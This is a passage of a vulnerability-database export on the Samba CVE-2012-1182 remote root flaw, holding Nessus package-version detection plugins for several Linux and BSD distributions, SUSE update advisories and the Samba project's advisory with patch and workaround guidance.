value:\"p-cpe:/a:fermilab:scientific_linux:samba4-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"samba4-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-client-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-common-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-dc-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-dc-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-debuginfo-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-devel-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", 
reference:\"samba4-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-pidl-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-python-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-swat-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-test-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-winbind-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-winbind-clients-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"samba4-winbind-krb5-locator-4.0.0-55.el6.rc4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4 / samba4-client / samba4-common / samba4-dc / samba4-dc-libs / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:58:40", "description": "Samba development team reports :\n\nSamba versions 3.6.3 and all versions previous to this are affected by a vulnerability that allows remote code execution as the 'root' user from an anonymous connection.\n\nAs this does not require an authenticated connection it is the most serious vulnerability possible in a program, and users and vendors are encouraged to patch their Samba installations immediately.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-11T00:00:00", "type": "nessus", "title": "FreeBSD : samba -- 'root' credential remote code execution (baf37cd2-8351-11e1-894e-00215c6a37bb)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:samba34", "p-cpe:/a:freebsd:freebsd:samba35", "p-cpe:/a:freebsd:freebsd:samba36", 
"cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_BAF37CD2835111E1894E00215C6A37BB.NASL", "href": "https://www.tenable.com/plugins/nessus/58671", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58671);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-1182\");\n\n script_name(english:\"FreeBSD : samba -- 'root' credential remote code execution (baf37cd2-8351-11e1-894e-00215c6a37bb)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Samba development team reports :\n\nSamba versions 3.6.3 and all versions previous to this are affected by\na vulnerability that allows remote code execution as the 'root' user\nfrom an anonymous connection.\n\nAs this does not require an authenticated connection it is the most\nserious vulnerability possible in a program, and users and vendors are\nencouraged to patch their Samba installations immediately.\"\n );\n # https://vuxml.freebsd.org/freebsd/baf37cd2-8351-11e1-894e-00215c6a37bb.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?42d55cea\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba34\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba35\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba36\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"samba34>3.4.*<3.4.16\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba35>3.5.*<3.5.14\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba36>3.6.*<3.6.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:41:30", "description": "Fixes CVE-2010-1182.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-19T00:00:00", "type": "nessus", "title": "Fedora 17 : samba-3.6.4-82.fc17.1 (2012-5793)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1182", "CVE-2012-1182"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:samba", "cpe:/o:fedoraproject:fedora:17"], "id": "FEDORA_2012-5793.NASL", "href": "https://www.tenable.com/plugins/nessus/58789", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-5793.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58789);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"FEDORA\", value:\"2012-5793\");\n\n script_name(english:\"Fedora 17 : samba-3.6.4-82.fc17.1 (2012-5793)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fixes CVE-2010-1182.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=811392\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-April/078726.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f21e5094\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"samba-3.6.4-82.fc17.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-27T14:41:32", "description": "Fixes CVE-2010-1182.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2012-04-16T00:00:00", "type": "nessus", "title": "Fedora 16 : samba-3.6.4-82.fc16 (2012-5843)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1182", "CVE-2012-1182"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:samba", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2012-5843.NASL", "href": "https://www.tenable.com/plugins/nessus/58755", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-5843.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58755);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name:\"FEDORA\", value:\"2012-5843\");\n\n script_name(english:\"Fedora 16 : samba-3.6.4-82.fc16 (2012-5843)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fixes CVE-2010-1182.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=811392\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-April/078258.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?78503d7f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"samba-3.6.4-82.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:05:46", "description": "A remote code execution flaw in Samba has been fixed:\n\n * CVE-2012-1182: PIDL based autogenerated code uses\n client supplied size values which allows attackers to write\n beyond the allocated array size\n", "cvss3": {}, "published": "2012-04-14T14:08:19", "type": "suse", "title": "Security update for Samba (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-14T14:08:19", "id": "SUSE-SU-2012:0501-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00010.html", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:15:22", "description": "A remote code execution flaw in Samba has been fixed:\n\n * CVE-2012-1182: PIDL based autogenerated code uses\n client supplied size values which allows attackers to write\n beyond the allocated array size\n\n Also the following bug has been fixed:\n\n * mount.cifs: Properly update mtab during remount;\n (bnc#747906).\n", "cvss3": {}, "published": "2012-04-14T14:08:17", "type": "suse", "title": "Security update for Samba (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-14T14:08:17", "id": "SUSE-SU-2012:0504-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00009.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:56:36", "description": "Samba upgrade to version 3.6.3 fixes the following\n security issue:\n\n - PIDL based autogenerated code allows overwriting beyond\n of allocated array. 
Remote attackers could exploit that\n to execute arbitrary code as root (CVE-2012-1182,\n bso#8815, bnc#752797)\n\n Please see /usr/share/doc/packages/samba/WHATSNEW.txt from\n the samba-doc package or the package change log (rpm -q\n --changelog samba) for more details of the version update.\n\n", "cvss3": {}, "published": "2012-04-16T16:08:12", "type": "suse", "title": "update for samba (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-16T16:08:12", "id": "OPENSUSE-SU-2012:0508-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00012.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:36:14", "description": "A remote code execution flaw in Samba has been fixed:\n\n * CVE-2012-1182: PIDL based autogenerated code uses\n client supplied size values which allows attackers to write\n beyond the allocated array size\n", "cvss3": {}, "published": "2012-04-14T10:08:19", "type": "suse", "title": "Security update for Samba (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-14T10:08:19", "id": "SUSE-SU-2012:0501-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00007.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:46:06", "description": "A remote code execution flaw in Samba has been fixed:\n\n * CVE-2012-1182: PIDL based autogenerated code uses\n client supplied size values which allows attackers to write\n beyond the allocated array size\n\n Also the following bugs have been fixed:\n\n * Samba printer name marshalling problems (bnc#722663)\n * mount.cifs: properly update mtab during remount\n (bnc#747906)\n * s3: compile IDL files in autogen, some configure\n tests need this.\n * Fix incorrect types in the full audit VFS module. 
Add\n null terminators to audit log enums (bnc#742885)\n * Do not map POSIX execute permission to Windows\n FILE_READ_ATTRIBUTES; (bso#8631); (bnc#732572).\n", "cvss3": {}, "published": "2012-04-14T10:08:18", "type": "suse", "title": "Security update for Samba (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2012-04-14T10:08:18", "id": "SUSE-SU-2012:0500-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00006.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:03:49", "description": "- Add the ldapsmb sources as else patches against them have\n no chance to apply.\n\n - Samba pre-3.6.4 are affected by a vulnerability that\n allows remote code execution as the \"root\" user; PIDL\n based autogenerated code allows overwriting beyond of\n allocated array; CVE-2012-1182; (bso#8815); (bnc#752797).\n\n - s3-winbindd: Only use SamLogonEx when we can get\n unencrypted session keys; (bso#8599).\n - Correctly handle DENY ACEs when privileges apply;\n (bso#8797).\n\n - s3:smb2_server: fix a logic error, we should sign non\n guest sessions; (bso8749).\n - Allow vfs_aio_pthread to build as a static module;\n (bso#8723).\n - s3:dbwrap_ctdb: return the number of records in\n db_ctdb_traverse() for persistent dbs; (#bso8527).\n - s3: segfault in dom_sid_compare(bso#8567).\n - Honor SeTakeOwnershipPrivilege when client asks for\n SEC_STD_WRITE_OWNER; (bso#8768).\n - s3-winbindd: Close netlogon connection if the status\n returned by the NetrSamLogonEx call is timeout in the\n pam_auth_crap path; (bso#8771).\n - s3-winbindd: set the can_do_validation6 also for trusted\n domain; (bso#8599).\n - Fix problem when calculating the share security mask,\n take privileges into account for the connecting user;\n (bso#8784).\n\n - Fix crash in dcerpc_lsa_lookup_sids_noalloc() with over\n 1000 groups; (bso#8807); (bnc#751454).\n\n - Remove 
obsoleted Authors lines from spec file for\n post-11.2 systems.\n\n - Make ldapsmb build with Fedora 15 and 16; (bso#8783).\n - BuildRequire libuuid-devel for post-11.0 and other\n systems.\n - Define missing python macros for non SUSE systems.\n - PreReq to fillup_prereq and insserv_prereq only on SUSE\n systems.\n - Always use cifstab instead of smbfstab on non SUSE\n systems.\n\n - Ensure AndX offsets are increasing strictly monotonically\n in pre-3.4 versions; CVE-2012-0870; (bnc#747934).\n\n - Add SERVERID_UNIQUE_ID_NOT_TO_VERIFY; (bso#8760);\n (bnc#741854).\n\n - s3-printing: fix crash in printer_list_set_printer();\n (bso#8762); (bnc#746825).\n\n", "cvss3": {}, "published": "2012-04-16T15:08:16", "type": "suse", "title": "update for samba (critical)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2012-1182", "CVE-2012-0870"], "modified": "2012-04-16T15:08:16", "id": "OPENSUSE-SU-2012:0507-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-04/msg00011.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "samba": [{"lastseen": "2021-10-13T09:49:46", "description": "## Description\n\nSamba versions 3.6.3 and all versions previous to this are affected by\na vulnerability that allows remote code execution as the \"root\" user\nfrom an anonymous connection.\n\nThe code generator for Samba's remote procedure call (RPC) code\ncontained an error which caused it to generate code containing a\nsecurity flaw. This generated code is used in the parts of Samba that\ncontrol marshalling and unmarshalling of RPC calls over the network.\n\nThe flaw caused checks on the variable containing the length of an\nallocated array to be done independently from the checks on the\nvariable used to allocate the memory for that array. 
As both these\nvariables are controlled by the connecting client it makes it possible\nfor a specially crafted RPC call to cause the server to execute\narbitrary code.\n\nAs this does not require an authenticated connection it is the most\nserious vulnerability possible in a program, and users and vendors are\nencouraged to patch their Samba installations immediately.\n## Patch Availability\n\nPatches addressing this issue have been posted to:\n\n http://www.samba.org/samba/security/\n\nAdditionally, Samba 3.6.4, Samba 3.5.14 and 3.4.16 have been issued as\nsecurity releases to correct the defect. Patches against older Samba\nversions are available at:\n\n http://samba.org/samba/patches/\n\nSamba administrators running affected versions are advised to upgrade\nto 3.6.4, 3.5.14, or 3.4.16 or apply these patches as soon as\npossible.\n\nDue to the seriousness of this vulnerability, patches have been\nreleased for all Samba versions currently out of support and\nmaintenance from 3.0.37 onwards.\n\nPatches for the 3.6 series also apply to Samba4 alpha18 and can be used to\nmake a pure security release on top of it.\n## Workaround\n\nSamba contains a \"hosts allow\" parameter that can be used inside\nsmb.conf to restrict the clients allowed to connect to the server to a\ntrusted list. This can be used to help mitigate the problem caused by\nthis bug but it is by no means a real fix, as client addresses can be\neasily faked.\n## Credits\n\nThis vulnerability and proof of concept code was provided by Brian\nGorenc as well as an anonymous researcher working with HP's Zero Day\nInitiative program. 
